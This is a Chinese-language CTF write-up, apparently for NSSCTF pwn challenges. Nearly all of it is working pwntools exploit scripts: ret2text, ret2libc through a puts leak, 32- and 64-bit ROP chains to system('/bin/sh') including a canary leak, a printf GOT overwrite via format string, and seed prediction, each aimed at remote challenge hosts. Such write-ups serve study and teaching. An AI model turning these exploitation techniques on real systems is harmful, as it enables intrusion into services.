目录
ret2text
发生了明显的溢出,并且也发现了有后面函数,可以直接溢出,exp如下:
from pwn import *
io =remote('node1.anna.nssctf.cn',28287)
backdoor =0x4014BA
ret =0x40101a
payload =b'A'*(0X40 +8) +p64(ret) +p64(backdoor)
io.sendline(payload)
io.interactive()
ret2libc
很传统的经典题型,利用puts泄露libc
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
# io = process(pwnfile)
io = remote('node3.anna.nssctf.cn',28546)
elf =ELF('./111')
got_addr = elf.got['puts']
plt_addr = elf.plt['puts']
main_addr = 0x4011A8
rdi_addr = 0x40117e
ret_addr = 0x40101a
payload = b'a'*(0x40 +8) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(main_addr)
io.sendline(payload)
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
print('puts_addr:',hex(puts_addr))
#put_addr =u64(io.recv(6).ljust(8,b'\x00'))
#print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
payload = b'a'*(0x40 +8) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr)
io.sendline(payload)
io.interactive()
rop32
因为这里可以直接call system,并且还有binsh,直接构造就完事了,exp如下:
from pwn import *
context(log_level='debug',arch='amd64', os='linux')
#io = process(pwnfile)
io = remote('node3.anna.nssctf.cn',28903)
bin_addr =0x804C024
sys_addr =0x80491E7
payload =b'A'*(0x1c +4) +p32(sys_addr) +p32(bin_addr)
io.sendline(payload)
io.interactive()
rop64
因为保护机制开启了canary,所以首先要绕过,才好开展后续工作
这里可以直接泄露canary的地址,并且canary =0x28,后续就是经典的套路了
from pwn import *
# from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile= './111'
# p = process(pwnfile)
p = remote("node1.anna.nssctf.cn",28912)
payload1 = b'a'*0x29 # canary=0x30-0x8 ,因为要溢出canary,所以要加一,为0x29
p.sendafter(b"Go Go Go!!!\n", payload1)
p.recvuntil(b'a'*0x29)
canary = u64(p.recv(7).rjust(8, b'\x00'))
print(hex(canary))
rdi_addr = 0x4011de
ret_addr = 0x40101a
system = 0x401284
binsh = 0x404058
payload =b'a'*0x28 + p64(canary) + b'a'*8 +p64(rdi_addr) +p64(binsh) +p64(system)
p.send(payload)
p.interactive()
filedes
这题的知识点比较偏吧,文件的标准输出流
endian
这题因为反汇编里面说了需要输入两个整数,再加上小端序的缘故,所以要倒过来,exp如下:
#https://www.sojson.com/hexadecimal.html 进制转换
from pwn import *
p = remote("node3.anna.nssctf.cn",28598)
payload = 0x616b694d # akiM
p.sendline(str(payload))
payload = 0x424e6f74 # BNot
p.sendline(str(payload))
p.interactive()
border
再加上,要输出溢出的长度,求出两间的距离
from pwn import *
context(log_level='debug',arch='amd64', os='linux')
io = remote('1.14.71.254',28780 )
io.recvuntil('length:')
io.sendline(b"32")
io.recvuntil('content:')
io.send(b"a"*32)
io.interactive()
buffer overflow
需要点逆向的能力,看代码,可知
from pwn import *
context(log_level='debug',arch='amd64', os='linux')
#io = process(pwnfile)
io = remote('node2.anna.nssctf.cn',28309)
elf = ELF('./111')
rop = ROP('./111')
io.recvuntil('Write down your note:\n')
payload = b'a'*70 + b'Limiter and Wings are beautiful girls!\x00'
io.send(payload)
io.interactive()
babyfmt
已经告诉了后面函数,但是发生了格式字符串漏洞,可以通过运行程序找到偏移,exp如下:
from pwn import *
p = remote('node1.anna.nssctf.cn',28931)
elf = ELF('./111')
printf_got = elf.got["printf"]
p.recvuntil("\n")
p.sendline("%10$s")
backdoor = int(p.recv(10),16)
payload = fmtstr_payload(11,{printf_got:backdoor})
p.sendline(payload)
p.interactive()
random
这题就是随机数,时间做种子,来解决,这里我有点不明白接收一下 b'a'*0x20,没有看明白
from pwn import *
from ctypes import *
p = remote("node2.anna.nssctf.cn",28497) #process(program)
elf = ELF('./111')
payload =b'a'*0x20
p.sendafter("username: ",payload)
payload = b'ls_4nyth1n9_7ruIy_R4nd0m?\x00'
p.sendlineafter("password: ",payload)
p.recvuntil("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
seed = u64(p.recvline(b"\x7f")[-6:].ljust(8, b'\x00'))
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(seed)
v3 = libc.rand()
v4 = libc.rand() ^ v3
v5 = libc.rand()
libc.srand(v4 ^ v5)
libc.rand()
libc.rand()
libc.rand()
v8 = libc.rand()
p.sendlineafter("Please tell me the number you guess now.\n",str(v8))
p.interactive()